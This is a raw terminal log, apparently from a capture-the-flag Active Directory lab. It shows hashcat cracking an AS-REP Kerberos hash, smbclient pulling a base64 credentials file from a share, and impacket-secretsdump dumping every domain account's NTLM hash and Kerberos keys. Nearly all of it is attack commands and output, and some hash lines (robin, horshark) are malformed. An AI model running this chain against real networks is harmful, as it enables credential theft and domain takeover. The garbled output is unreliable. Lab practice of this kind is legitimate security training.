$krb5asrep$23$svc-admin@THM-AD:6c4b5c587e1486e85fae...daa451 Time.Started.....: Thu Dec 30 15:20:45 2021 (0 secs) Time.Estimated...: Thu Dec 30 15:20:45 2021 (0 secs) Guess.Base.......: File (passwordlist.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 1764.8 kH/s (5.36ms) @ Accel:32 Loops:1 Thr:64 Vec:8 Recovered........: 1/1 (100.00%) Digests Progress.........: 12288/70188 (17.51%) Rejected.........: 0/12288 (0.00%) Restore.Point....: 0/70188 (0.00%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidates.#1....: m123456 -> henrik Started: Thu Dec 30 15:20:44 2021 Stopped: Thu Dec 30 15:20:47 2021

smbclient -L 10.10.113.122 -U 'svc-admin' -p Enter WORKGROUP\svc-admin's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin backup Disk C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.113.122 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available

smbclient //10.10.113.122/backup -U 'svc-admin' -p 130 ⨯ Enter WORKGROUP\svc-admin's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Sat Apr 4 15:08:39 2020 .. D 0 Sat Apr 4 15:08:39 2020 backup_credentials.txt A 48 Sat Apr 4 15:08:53 2020 8247551 blocks of size 4096. 3636099 blocks available smb: \> get backup_credentials.txt getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) smb: \> exit ┌──(kali㉿kali)-[~/THM/Attacktive-Directory] └─$ cat backup_credentials.txt YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

impacket-secretsdump -just-dc THM-AD/backup:backup2517860@10.10.113.122 Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash) [*] Using the DRSUAPI method to get NTDS.DIT secrets Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21::: spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4::: spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b::: spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e::: spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b::: spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7::: spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a::: spookysec.local\robin:1110:aad3b435b51404eeaad19741bde08e135f4b40f1ca9aab455383b435b51404ee:642744a46b9d4f6dff8942d23626e5bb::: spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2::: spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705::: spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404eeaad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:41317db6bd1fb8c21c2fd2b675238664::: spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809::: spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::: spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc::: ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:162d12304960732d9439d2af8e14d1bd::: [*] Kerberos keys grabbed Administrator:aes256-cts-hmac-sha1-96:713955f08a8654fb8f70afe0e24bb50eed14e53c8b2274c0c701ad2948ee0f48 Administrator:aes128-cts-hmac-sha1-96:e9077719bc770aff5d8bfc2d54d226ae Administrator:des-cbc-md5:2079ce0e5df189ad krbtgt:aes256-cts-hmac-sha1-96:b52e11789ed6709423fd7276148cfed7dea6f189f3234ed0732725cd77f45afc krbtgt:aes128-cts-hmac-sha1-96:e7301235ae62dd8884d9b890f38e3902 krbtgt:des-cbc-md5:b94f97e97fabbf5d spookysec.local\skidy:aes256-cts-hmac-sha1-96:3ad697673edca12a01d5237f0bee628460f1e1c348469eba2c4a530ceb432b04 spookysec.local\skidy:aes128-cts-hmac-sha1-96:484d875e30a678b56856b0fef09e1233 spookysec.local\skidy:des-cbc-md5:b092a73e3d256b1f spookysec.local\breakerofthings:aes256-cts-hmac-sha1-96:4c8a03aa7b52505aeef79cecd3cfd69082fb7eda429045e950e5783eb8be51e5 spookysec.local\breakerofthings:aes128-cts-hmac-sha1-96:38a1f7262634601d2df08b3a004da425 spookysec.local\breakerofthings:des-cbc-md5:7a976bbfab86b064 spookysec.local\james:aes256-cts-hmac-sha1-96:1bb2c7fdbecc9d33f303050d77b6bff0e74d0184b5acbd563c63c102da389112 spookysec.local\james:aes128-cts-hmac-sha1-96:08fea47e79d2b085dae0e95f86c763e6 spookysec.local\james:des-cbc-md5:dc971f4a91dce5e9 spookysec.local\optional:aes256-cts-hmac-sha1-96:fe0553c1f1fc93f90630b6e27e188522b08469dec913766ca5e16327f9a3ddfe spookysec.local\optional:aes128-cts-hmac-sha1-96:02f4a47a426ba0dc8867b74e90c8d510 spookysec.local\optional:des-cbc-md5:8c6e2a8a615bd054 spookysec.local\sherlocksec:aes256-cts-hmac-sha1-96:80df417629b0ad286b94cadad65a5589c8caf948c1ba42c659bafb8f384cdecd spookysec.local\sherlocksec:aes128-cts-hmac-sha1-96:c3db61690554a077946ecdabc7b4be0e spookysec.local\sherlocksec:des-cbc-md5:08dca4cbbc3bb594 spookysec.local\darkstar:aes256-cts-hmac-sha1-96:35c78605606a6d63a40ea4779f15dbbf6d406cb218b2a57b70063c9fa7050499 spookysec.local\darkstar:aes128-cts-hmac-sha1-96:461b7d2356eee84b211767941dc893be spookysec.local\darkstar:des-cbc-md5:758af4d061381cea spookysec.local\Ori:aes256-cts-hmac-sha1-96:5534c1b0f98d82219ee4c1cc63cfd73a9416f5f6acfb88bc2bf2e54e94667067 spookysec.local\Ori:aes128-cts-hmac-sha1-96:5ee50856b24d48fddfc9da965737a25e spookysec.local\Ori:des-cbc-md5:1c8f79864654cd4a spookysec.local\robin:aes256-cts-hmac-sha1-96:8776bd64fcfcf3800df2f958d144ef72473bd89e310d7a6574f4635ff64b40a3 spookysec.local\robin:aes128-cts-hmac-sha1-96:733bf907e518d2334437eacb9e4033c8 spookysec.local\robin:des-cbc-md5:89a7c2fe7a5b9d64 spookysec.local\paradox:aes256-cts-hmac-sha1-96:64ff474f12aae00c596c1dce0cfc9584358d13fba827081afa7ae2225a5eb9a0 spookysec.local\paradox:aes128-cts-hmac-sha1-96:f09a5214e38285327bb9a7fed1db56b8 spookysec.local\paradox:des-cbc-md5:83988983f8b34019 spookysec.local\Muirland:aes256-cts-hmac-sha1-96:81db9a8a29221c5be13333559a554389e16a80382f1bab51247b95b58b370347 spookysec.local\Muirland:aes128-cts-hmac-sha1-96:2846fc7ba29b36ff6401781bc90e1aaa spookysec.local\Muirland:des-cbc-md5:cb8a4a3431648c86 spookysec.local\horshark:aes256-cts-hmac-sha1-96:891e3ae9c420659cafb5a6237120b50f26481b6838b3efa6a171ae84dd11c166 spookysec.local\horshark:aes128-cts-hmac-sha1-96:c6f6248b932ffd75103677a15873837c spookysec.local\horshark:des-cbc-md5:a823497a7f4c0157 spookysec.local\svc-admin:aes256-cts-hmac-sha1-96:effa9b7dd43e1e58db9ac68a4397822b5e68f8d29647911df20b626d82863518 spookysec.local\svc-admin:aes128-cts-hmac-sha1-96:aed45e45fda7e02e0b9b0ae87030b3ff spookysec.local\svc-admin:des-cbc-md5:2c4543ef4646ea0d spookysec.local\backup:aes256-cts-hmac-sha1-96:23566872a9951102d116224ea4ac8943483bf0efd74d61fda15d104829412922 spookysec.local\backup:aes128-cts-hmac-sha1-96:843ddb2aec9b7c1c5c0bf971c836d197 spookysec.local\backup:des-cbc-md5:d601e9469b2f6d89 spookysec.local\a-spooks:aes256-cts-hmac-sha1-96:cfd00f7ebd5ec38a5921a408834886f40a1f40cda656f38c93477fb4f6bd1242 spookysec.local\a-spooks:aes128-cts-hmac-sha1-96:31d65c2f73fb142ddc60e0f3843e2f68 spookysec.local\a-spooks:des-cbc-md5:e09e4683ef4a4ce9 ATTACKTIVEDIREC$:aes256-cts-hmac-sha1-96:d04691edc1c844600ded082e1e79e00fdc8bff2604811122ed676035de026430 ATTACKTIVEDIREC$:aes128-cts-hmac-sha1-96:a2d8605f33eb85e2463b34a2af3ff994 ATTACKTIVEDIREC$:des-cbc-md5:8afda8c1c7348c58 [*] Cleaning up...